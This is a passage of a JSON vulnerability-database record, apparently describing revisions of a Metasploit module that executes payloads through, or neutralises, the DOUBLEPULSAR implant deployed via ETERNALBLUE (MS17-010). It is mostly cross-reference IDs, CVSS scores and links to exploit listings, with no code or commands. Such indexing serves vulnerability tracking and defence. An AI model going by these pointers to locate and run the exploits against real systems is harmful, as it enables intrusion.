"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/FREEBSD/MISC/CITRIX_NETSCALER_SOAP_BOF", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-08-01T21:14:18", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "bc4baba7087cd44277e80965f65cf0b7", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "lastseen": "2020-08-01T21:14:18", "metasploitHistory": "", "metasploitReliability": "", "modified": "2020-02-03T17:16:16", "objectVersion": "1.4", "published": "2019-09-30T19:18:41", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/doublepulsar_rce.rb", "title": "DOUBLEPULSAR Payload Execution and Neutralization", "type": "metasploit", "viewCount": 1386}, "differentElements": ["published", "modified"], "edition": 69, "lastseen": "2020-08-01T21:14:18"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-08-11T12:59:43", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-08-11T12:59:43", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "849cc2b78ad9d07232bb964042aa03b4", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "lastseen": "2020-08-11T12:59:43", "metasploitHistory": "", "metasploitReliability": "", "modified": "1976-01-01T00:00:00", "objectVersion": "1.4", "published": "1976-01-01T00:00:00", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/doublepulsar_rce.rb", "title": "DOUBLEPULSAR Payload Execution and Neutralization", "type": "metasploit", "viewCount": 1388}, "differentElements": ["published", "modified"], "edition": 70, "lastseen": "2020-08-11T12:59:43"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-07-14T03:11:42", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-07-14T03:11:42", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "bc4baba7087cd44277e80965f65cf0b7", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "lastseen": "2020-07-14T03:11:42", "metasploitHistory": "", "metasploitReliability": "", "modified": "2020-02-03T17:16:16", "objectVersion": "1.4", "published": "2019-09-30T19:18:41", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/doublepulsar_rce.rb", "title": "DOUBLEPULSAR Payload Execution and Neutralization", "type": "metasploit", "viewCount": 1366}, "differentElements": ["published", "modified"], "edition": 67, "lastseen": "2020-07-14T03:11:42"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-08-11T23:21:05", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/UNIX/WEBAPP/WEBTESTER_EXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-08-11T23:21:05", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "bc4baba7087cd44277e80965f65cf0b7", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "lastseen": "2020-08-11T23:21:05", "metasploitHistory": "", "metasploitReliability": "", "modified": "2020-02-03T17:16:16", "objectVersion": "1.4", "published": "2019-09-30T19:18:41", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/doublepulsar_rce.rb", "title": "DOUBLEPULSAR Payload Execution and Neutralization", "type": "metasploit", "viewCount": 1391}, "differentElements": ["published", "modified"], "edition": 71, "lastseen": "2020-08-11T23:21:05"}], "viewCount": 1786, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", 